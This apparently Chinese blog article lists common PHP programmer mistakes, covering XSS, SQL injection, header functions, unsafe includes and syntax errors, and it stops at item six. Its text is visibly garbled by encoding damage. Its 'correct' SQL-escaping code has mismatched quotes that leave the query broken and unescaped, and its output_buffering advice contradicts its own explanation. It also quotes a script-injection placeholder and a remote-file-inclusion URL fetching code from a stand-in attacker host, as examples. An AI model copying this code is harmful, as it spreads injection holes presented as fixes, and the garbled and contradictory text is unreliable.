PHP是個(gè)偉大的web開發(fā)語(yǔ)言，靈活的語(yǔ)言，但是看到php程序員周而復(fù)始的犯的一些錯(cuò)誤。我做了下面這個(gè)列表，列出了PHP程序員經(jīng)常犯的10中錯(cuò)誤，大多數(shù)和安全相關(guān)?？纯茨惴噶藥追N：

1.不轉(zhuǎn)意html entities

一個(gè)基本的常識(shí)：所有不可信任的輸入（特別是用戶從form中提交的數(shù)據(jù)） ，輸出之前都要轉(zhuǎn)意。

echo $_GET['usename'] ; 

這個(gè)例子有可能輸出：

<script>/*更改admin密碼的腳本或設(shè)置cookie的腳本*/</script>

這是一個(gè)明顯的安全隱患，除非你保證你的用戶都正確的輸入。

如何修復(fù)：

我們需要將”< “,”>”,”and”等轉(zhuǎn)換成正確的HTML表示(<, >’, and “)，函數(shù)htmlspecialchars 和htmlentities()正是干這個(gè)活的。

正確的方法：

echo htmlspecialchars($_GET['username'], ENT_QUOTES); 

2. 不轉(zhuǎn)意SQL輸入

我曾經(jīng)在一篇文章中最簡(jiǎn)單的防止sql注入的方法(php+mysql中)討論過(guò)這個(gè)問(wèn)題并給出了一個(gè)簡(jiǎn)單的方法。有人對(duì)我說(shuō)，他們已經(jīng)在php.ini中將magic_quotes設(shè)置為On，所以不必?fù)?dān)心這個(gè)問(wèn)題，但是不是所有的輸入都是從$_GET, $_POST或 $_COOKIE中的得到的！

如何修復(fù)：和在最簡(jiǎn)單的防止sql注入的方法(php+mysql中)中一樣我還是推薦使用mysql_real_escape_string()函數(shù)

正確做法：

<?php  
$sql = “UPDATE users SET  
name=’.mysql_real_escape_string($name).’  
WHERE id=’.mysql_real_escape_string ($id).’”;  
mysql_query($sql);  
?> 

3.錯(cuò)誤的使用HTTP-header 相關(guān)的函數(shù):header(), session_start(), setcookie()

遇到過(guò)這個(gè)警告嗎?”warning: Cannot addheader information - headers already sent [....]

每次從服務(wù)器下載一個(gè)網(wǎng)頁(yè)的時(shí)候，服務(wù)器的輸出都分成兩個(gè)部分：頭部和正文。

頭部包含了一些非可視的數(shù)據(jù)，例如cookie。頭部總是先到達(dá)。正文部分包括可視的html，圖片等數(shù)據(jù)。如果output_buffering設(shè)置為Off，所有的HTTP-header相關(guān)的函數(shù)必須在有輸出之前調(diào)用。問(wèn)題在于你在一個(gè)環(huán)境中開發(fā)，而在部署到另一個(gè)環(huán)境中去的時(shí)候，output_buffering的設(shè)置可能不一樣。結(jié)果轉(zhuǎn)向停止了，cookie和session都沒(méi)有正確的設(shè)置……..。

如何修復(fù):確保在輸出之前調(diào)用http-header相關(guān)的函數(shù)，并且令output_buffering = Off。

4. Require 或include 的文件使用不安全的數(shù)據(jù)

再次強(qiáng)調(diào)：不要相信不是你自己顯式聲明的數(shù)據(jù)。不要 Include 或 require 從$_GET,$_POST 或 $_COOKIE 中得到的文件。

例如:

index.php  
<?  
//including header, config, database connection, etc  
include($_GET['filename']);  
//including footer  
?> 

現(xiàn)在任一個(gè)黑客現(xiàn)在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt來(lái)獲取你的機(jī)密信息，或執(zhí)行一個(gè)PHP腳本。

如果allow_url_fopen=On，你更是死定了：

試試這個(gè)輸入：http://www.yourdomain.com/index. … n.com%2Fphphack.php

現(xiàn)在你的網(wǎng)頁(yè)中包含了http://www.youaredoomed.com/phphack.php的輸出. 黑客可以發(fā)送垃圾郵件，改變密碼，刪除文件等等。只要你能想得到。

如何修復(fù)：你必須自己控制哪些文件可以包含在的include或require指令中。

下面是一個(gè)快速但不全面的解決方法：

<?  
//Include only files that are allowed.  
$allowedFiles = array(’file1.txt’,'file2.txt’,'file3.txt’);  
if(in_array((string)$_GET['filename'],$allowedFiles)) {  
include($_GET['filename']);  
}  
else{  
exit(’not allowed’);  
}  
?> 

5. 語(yǔ)法錯(cuò)誤

語(yǔ)法錯(cuò)誤包括所有的詞法和語(yǔ)法錯(cuò)誤，太常見(jiàn)了，以至于我不得不在這里列出。解決辦法就是認(rèn)真學(xué)習(xí)PHP的語(yǔ)法，仔細(xì)一點(diǎn)不要漏掉一個(gè)括號(hào)，大括號(hào)，分號(hào)，引號(hào)。還有就是換個(gè)好的編輯器，就不要用記事本了！

6.很少使用或不用面向?qū)ο?/strong>